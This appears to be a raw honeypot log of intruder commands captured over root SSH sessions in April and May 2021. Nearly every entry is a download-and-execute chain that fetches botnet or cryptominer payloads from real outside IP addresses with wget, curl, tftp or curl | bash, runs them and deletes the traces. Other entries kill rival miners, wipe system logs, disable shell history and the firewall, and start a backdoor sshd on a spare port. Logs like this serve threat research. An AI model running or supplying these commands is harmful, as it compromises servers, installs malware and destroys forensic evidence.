Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.49.42/warz.sh; curl -O 209.141.49.42/warz.sh; chmod 777 warz.sh; sh warz.sh; rm -rf warz.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget 209.141.49.42/warz.sh
curl -O 209.141.49.42/warz.sh
chmod 777 warz.sh
sh warz.sh
rm -rf warz.sh
rm -rf *

From 100.21.159.3 3-Apr-2021 18:07:38 ssh2 root
Exec echo -n a2xdtJSf|md5sum
echo -n a2xdtJSf|md5sum

From 134.209.239.209 5-Apr-2021 04:07:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.151.61.216/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 45.151.61.216 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.151.61.216; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.151.61.216/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 45.151.61.216 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.151.61.216
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.36.81.58 6-Apr-2021 17:41:35 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; chmod 777 *; ./x86_64 x86hxed; pkill xmrig; pkill cnrig;
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
chmod 777 *
./x86_64 x86hxed
pkill xmrig
pkill cnrig

From 82.156.18.109 6-Apr-2021 17:53:21 ssh2 root
Exec echo -n Vf9tW2gR|md5sum
echo -n Vf9tW2gR|md5sum

From 185.36.81.58 7-Apr-2021 06:17:15 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; chmod 777 *; ./x86_64 x86hxed; pkill xmrig; pkill cnrig;
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
chmod 777 *
./x86_64 x86hxed
pkill xmrig
pkill cnrig

From 134.228.217.148 7-Apr-2021 08:47:12 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 83.150.16.14 7-Apr-2021 19:44:45 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
Exec uname -a ; lscpu
uname -a
uname -a
lscpu
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 83.150.16.14 7-Apr-2021 19:44:45 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 103.216.63.149 8-Apr-2021 18:23:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://88.218.17.110/bins/Oblivion121.x86; curl -O http://88.218.17.110/bins/Oblivion121.x86;cat Oblivion121.x86 >cp;chmod +x *;./cp x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://88.218.17.110/bins/Oblivion121.x86
curl -O http://88.218.17.110/bins/Oblivion121.x86
cat Oblivion121.x86 >cp
chmod +x *
./cp x86

From 106.14.38.50 9-Apr-2021 01:08:06 ssh2 root
Exec echo -n AuwTbOOz|md5sum
echo -n AuwTbOOz|md5sum

From 61.149.215.166 10-Apr-2021 02:01:21 ssh2 root
Exec echo -n FmssLWZd|md5sum
echo -n FmssLWZd|md5sum

From 45.95.168.192 11-Apr-2021 16:32:40 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 43.225.111.21 11-Apr-2021 23:44:32 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 142.93.240.92 12-Apr-2021 11:47:19 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://134.122.65.100/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 134.122.65.100 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 134.122.65.100; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://134.122.65.100/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 134.122.65.100 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 134.122.65.100
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 156.234.169.30 12-Apr-2021 12:21:27 ssh2 root
curl -s -L http://14.18.102.61:8666/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 200.85.63.230 12-Apr-2021 23:52:29 ssh2 root
Exec echo -n 9sq5fE8u|md5sum
echo -n 9sq5fE8u|md5sum

From 212.102.49.29 13-Apr-2021 08:40:16 ssh2 root
w
uname -a
history
last
ps -x
cd /home
ls -a
cd .ssh
ls -a
cd .ssh
ls -a
pwd
nproc
arp -a
ip r
cat .bash_history
cd
ls -a
cat .bash_history
top
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null unset HISTORY
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
unset HISTZONE
unset HISTLOG
unset HISTSAVE
history -n
unset WATCH
unset REMOTEHOST
unset REMOTEHOSTFILE unset HISTORY
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
unset HISTZONE
unset HISTLOG
unset HISTSAVE
history -n
unset WATCH
unset REMOTEHOST
unset REMOTEHOSTFILE
cd /usr/bin
wget 185.244.149.237/e4.esp
tar xvf e4.esp
rm -rf e4.esp
cd e4
chmod +x *
./run
wget
wget 185.244.149.237/e4.esp
http://185.244.149.237/e4.esp
curl -Ã
curl -ÃO
wget
wget http://185.244.149.237/e4.esp
ls -a
pwd

From 185.233.100.23 13-Apr-2021 10:24:38 ssh2 root
w
ls
pwd
cd /home
ls -a
top
ps -x
ps aux
ifconfig
uname -a

From 185.36.81.98 13-Apr-2021 18:18:14 ssh2 root
Exec cd /tmp; rm - rf x86_64; wget http://107.172.249.148/x86_64; curl -O http://107.172.249.148/x86_64; busybox wget http://107.172.249.148/x86_64; chmod 777 x86_64; ./x86_64 roots; rm -rf *;
cd /tmp
rm - rf x86_64
wget http://107.172.249.148/x86_64
curl -O http://107.172.249.148/x86_64
busybox wget http://107.172.249.148/x86_64
chmod 777 x86_64
./x86_64 roots
rm -rf *

From 194.165.16.27 13-Apr-2021 18:47:19 ssh2 root
w
cd /home
ls -a
exit

From 47.61.246.210 14-Apr-2021 08:00:42 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
w
ps -x
cd /tmp
ls -al
cd /var/tmp
ls -al
wget http://185.244.149.237/r
perl r
yum install perl
apt-get install perl
ls -al
wget http://185.244.149.237/r
perl r
uname -a
nproc
ps -x
kill -9 17509
kill -9 17341
kill -9 22262
kill -9 6781
ps -x
kill -9 17341
ps -x
kill -9 17341
kill -9 17509
kill -9 22296
ps -x
reboot
restart
exit

From 109.104.151.108 14-Apr-2021 14:58:21 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtro/mbot.x86; chmod +x mbot.x86; ./mbot.x86 Spoofed; rm -rf mbot.x86; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.108/mtro/mbot.x86
chmod +x mbot.x86
./mbot.x86 Spoofed
rm -rf mbot.x86
history -c

From 185.36.81.58 16-Apr-2021 00:49:25 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; curl -O http://45.14.149.204/x86_64; busybox wget http://45.14.149.204/x86_64; chmod 777 x86_64; ./x86_64 x86hxed;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
curl -O http://45.14.149.204/x86_64
busybox wget http://45.14.149.204/x86_64
chmod 777 x86_64
./x86_64 x86hxed

From 185.36.81.58 16-Apr-2021 22:26:54 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf x86_64; wget http://45.14.149.204/x86_64; curl -O http://45.14.149.204/x86_64; busybox wget http://45.14.149.204/x86_64; chmod 777 x86_64; ./x86_64 x86hxed; cat /etc/issue
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf x86_64
wget http://45.14.149.204/x86_64
curl -O http://45.14.149.204/x86_64
busybox wget http://45.14.149.204/x86_64
chmod 777 x86_64
./x86_64 x86hxed
cat /etc/issue

From 109.104.151.112 17-Apr-2021 00:29:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtr.sh;
curl -O http://109.104.151.108/mtr.sh; chmod +x mtr.sh; sh mtr.sh; tftp 109.104.151.108 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.108; chmod 777 mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.108/mtr.sh
curl -O http://109.104.151.108/mtr.sh
chmod +x mtr.sh
sh mtr.sh
tftp 109.104.151.108 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.108
chmod 777 mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 150.136.50.97 17-Apr-2021 21:24:37 ssh2 root
Exec echo -n vXSq6IVd|md5sum
echo -n vXSq6IVd|md5sum

From 167.172.108.34 18-Apr-2021 20:56:53 ssh2 root
Exec lscpu ; free -m
lscpu
free -m

From 198.23.200.241 20-Apr-2021 06:04:02 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 198.23.200.241 20-Apr-2021 06:05:59 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 198.23.200.241 20-Apr-2021 06:06:10 ssh2 root
Exec wget http://185.88.177.50/we.sh; chmod 777 *; sh we.sh
wget http://185.88.177.50/we.sh
chmod 777 *
sh we.sh

From 109.104.151.112 21-Apr-2021 05:58:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.10; chmod +x mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.10/mtr.sh
busybox http://109.104.151.10/mtr.sh
curl -O http://109.104.151.10/mtr.sh
chmod +x mtr.sh
sh mtr.sh
rm -rf mtr.sh
tftp 109.104.151.10 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.10
chmod +x mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 185.36.81.58 21-Apr-2021 15:48:30 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh

From 219.140.169.51 21-Apr-2021 18:31:47 ssh2 root
Exec ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oPort=1987

From 209.141.60.60 22-Apr-2021 04:42:55 ssh2 root
Exec pkill xmrig; pkill cnrig; pkill ip; pkill java; curl -O http://88.218.17.142/ant.sh; chmod 777 *; ./ant.sh; rm -rf *; echo x
pkill xmrig
pkill cnrig
pkill ip
pkill java
curl -O http://88.218.17.142/ant.sh
chmod 777 *
./ant.sh
rm -rf *
echo x

From 109.104.151.10 22-Apr-2021 11:10:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox wget http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -g 109.104.151.10; chmod +x mtr2.sh; sh mtr2.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
wget http://109.104.151.10/mtr.sh
busybox wget http://109.104.151.10/mtr.sh
curl -O http://109.104.151.10/mtr.sh
chmod +x mtr.sh
sh mtr.sh
rm -rf mtr.sh
tftp 109.104.151.10 -c get mtr1.sh
chmod 777 mtr1.sh
sh mtr1.sh
tftp -r mtr2.sh -g 109.104.151.10
chmod +x mtr2.sh
sh mtr2.sh
rm -rf *.sh
history -c

From 164.90.160.7 22-Apr-2021 13:35:29 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://157.230.6.23/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 157.230.6.23 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 157.230.6.23; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://157.230.6.23/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 157.230.6.23 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 157.230.6.23
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 144.76.98.125 22-Apr-2021 21:23:20 ssh2 root
Exec lscpu ; nproc ; wget https://cdn.discordapp.com/attachments/834709504049414155/834732084945092608/hq_dorks_124k_1.txt
lscpu
nproc
wget https://cdn.discordapp.com/attachments/834709504049414155/834732084945092608/hq_dorks_124k_1.txt

From 165.22.89.89 23-Apr-2021 11:56:54 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 165.22.89.89 23-Apr-2021 11:57:43 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://104.248.30.69/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 104.248.30.69 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 104.248.30.69; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://104.248.30.69/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 104.248.30.69 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 104.248.30.69
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 143.110.144.182 23-Apr-2021 14:17:02 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://64.227.103.117/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 64.227.103.117 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 64.227.103.117; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://64.227.103.117/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 64.227.103.117 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 64.227.103.117
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 205.185.122.102 23-Apr-2021 17:36:00 ssh2 root
Exec cd /tmp; wget http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; chmod 777 *; ./boom.sh; rm -rf *; pkill cnrig;
cd /tmp
wget http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
chmod 777 *
./boom.sh
rm -rf *
pkill cnrig

From 123.13.221.241 25-Apr-2021 00:57:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c httpµØÖ·;chmod 777 Ä¾Âí;./Ä¾Âí;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c httpµØÖ·
chmod 777 Ä¾Âí
./Ä¾Âí

From 205.185.120.201 25-Apr-2021 05:01:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://209.141.40.31/bins/x86; curl -O http://209.141.40.31/bins/x86 chmod 777 *; ./x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://209.141.40.31/bins/x86
curl -O http://209.141.40.31/bins/x86 chmod 777 *
./x86

From 205.185.120.201 26-Apr-2021 01:13:50 ssh2 root
Exec cd /tmp || cd /; wget -q http://209.141.40.31/bins/x86; curl -O http://209.141.40.31/bins/x86; chmod 777 *; ./x86
cd /tmp || cd /
wget -q http://209.141.40.31/bins/x86
curl -O http://209.141.40.31/bins/x86
chmod 777 *
./x86

From 179.43.176.42 26-Apr-2021 03:47:14 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 195.10.212.195 26-Apr-2021 05:17:50 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://157.245.140.252/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://157.245.140.252/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 81.104.121.15 26-Apr-2021 09:33:17 ssh2 root
w
uname -a
ls -a
nano test.pl
vi test.pl
cat test.pl
cd /mnt
ls -a
pwd
cd /
ls -a
cd /var/tmp
ls -a
wget denis.do.am/test.tgz

From 185.36.81.58 28-Apr-2021 04:46:53 ssh2 root
Exec pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh; cat /etc/issue;
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh
cat /etc/issue

From 209.141.49.19 30-Apr-2021 13:34:56 ssh2 root
Exec cat /etc/issue;
cat /etc/issue

From 179.43.176.42 1-May-2021 23:17:00 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.176.41/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 46.101.36.10 2-May-2021 04:47:22 ssh2 root
Exec echo -n 7mHmLJqz|md5sum
echo -n 7mHmLJqz|md5sum

From 86.124.137.149 2-May-2021 11:18:11 ssh2 root
ls
cd
ls
cat te
cat test.pl
wget nasapaul.com/v.yp
wget nasapaul.com/v.py
clear
l
wget
sl
curl nasapaul.com/v.py
ls
cd
ls
cd /home
ls
halt
kill -19 -1
exit

From 206.189.6.18 3-May-2021 11:34:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.139.100/x86/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 194.87.139.100 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.87.139.100; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.139.100 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.87.139.100/x86/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 194.87.139.100 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 194.87.139.100
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.87.139.100 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 46.101.210.213 4-May-2021 17:25:27 ssh2 root
Exec cd /tmp  cd /run  cd /; wget http://134.122.67.26/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 134.122.67.26 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 134.122.67.26; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp cd /run cd /
wget http://134.122.67.26/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 134.122.67.26 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 134.122.67.26
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 103.247.10.136 5-May-2021 03:27:32 ssh2 root
Exec echo -n PBTHwkWZ|md5sum
echo -n PBTHwkWZ|md5sum

From 5.15.44.118 6-May-2021 11:07:16 ssh2 root
top
w
uname -a
ps x
ls -all
wget iubi.freevar.com/r.tgz
curl
uname -a
ps ax
history
ip
ls
ps ax
wget
curl
yum
apy
apt
apt install
kill -9 -1
exit

From 185.36.81.58 8-May-2021 07:25:18 ssh2 root
Exec pkill kitten; pkill YDEdr; pkill ip; pkill xmrig; pkill cnrig; pkill kswapd0; pkill x86_64; pkill x86; cd /tmp; rm -rf config.json; rm -rf kitten; wget http://88.218.17.142/boom.sh; curl -O http://88.218.17.142/boom.sh; busybox wget http://88.218.17.142/boom.sh; chmod 777 *; sh boom.sh; cat /etc/issue;
pkill kitten
pkill YDEdr
pkill ip
pkill xmrig
pkill cnrig
pkill kswapd0
pkill x86_64
pkill x86
cd /tmp
rm -rf config.json
rm -rf kitten
wget http://88.218.17.142/boom.sh
curl -O http://88.218.17.142/boom.sh
busybox wget http://88.218.17.142/boom.sh
chmod 777 *
sh boom.sh
cat /etc/issue

From 222.240.98.30 10-May-2021 23:52:58 ssh2 root
Exec uname -a; cd /tmp ; curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
cd /tmp
curl -s -L http://194.5.250.113/xmr.sh | LC_ALL=en_US.UTF-8 bash -s

From 103.151.124.160 12-May-2021 09:31:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf installer.sh; wget http://51.75.170.84/installer.sh; chmod 777 installer.sh; sh installer.sh; rm -rf tftp1.sh; tftp 51.75.170.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; rm -rf tftp2.sh; tftp -r tftp2.sh -g 51.75.170.84; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf installer.sh
wget http://51.75.170.84/installer.sh
chmod 777 installer.sh
sh installer.sh
rm -rf tftp1.sh
